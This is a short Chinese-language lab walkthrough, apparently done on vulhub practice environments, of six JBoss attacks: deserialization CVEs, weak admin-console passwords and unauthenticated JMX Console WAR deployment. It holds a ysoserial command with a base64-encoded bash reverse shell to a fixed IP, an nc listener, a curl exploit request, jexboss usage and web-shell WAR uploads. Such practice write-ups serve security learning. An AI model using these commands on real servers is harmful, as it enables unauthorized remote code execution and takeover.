一、CVE-2015-7501
1、开环境
2、访问地址
出现了让下载的页面,说明有漏洞
3、下载ysoserial工具进行漏洞利用
4、在cmd运行
看到可以成功运行,接下来去base64编码我们反弹shell的命令
5、执行命令
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx}|{base64,-d} | {bash,-i} ">exp.ser
6、监听端口
nc -lvvp 6666
7、执行命令
curl http://150.158.199.164:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
8、得到shell
二、CVE-2017-7504
1、开环境
2、访问目录
/jbossmq-httpil/HTTPServerILServlet
3、在kali运行python程序
python jexboss.py -u 指定网站
拿到shell
三、CVE-2017-12149
1、开环境
2、访问目录
/invoker/readonly
返回500说明此页面存在反序列化漏洞
3、使用工具检测
输入网址,检测,存在漏洞,系统是Linux
4、执行命令
whoami
四、Administration Console弱口令
1、开环境
环境还是上一个的环境
2、登录后台
/admin-console/login.seam
使用弱口令admin/vulhub登录
3、点击web应用
4、上war包,注入这个包的名字不可以太短
5、访问文件
6、测试连接
五、低版本JMX Console未授权
1、开环境
访问/jmx-console/
密码是admin admin
2、进入目录
3、在我们服务器的网站上传一个war包
4、远程部署war包
http://150.158.199.164:8080/wjf111.war
5、访问文件
/wjf111/1.jsp
6、测试连接
六、高版本JMX Console未授权
1、开环境
访问/jmx-console
2、找到文件部署的位置
Jboss.system——service=MainDeployer
——deploy——java.net.URL
3、把我们服务器里的war包改下名字
4、远程部署war包
http://150.158.199.164/wjf222.war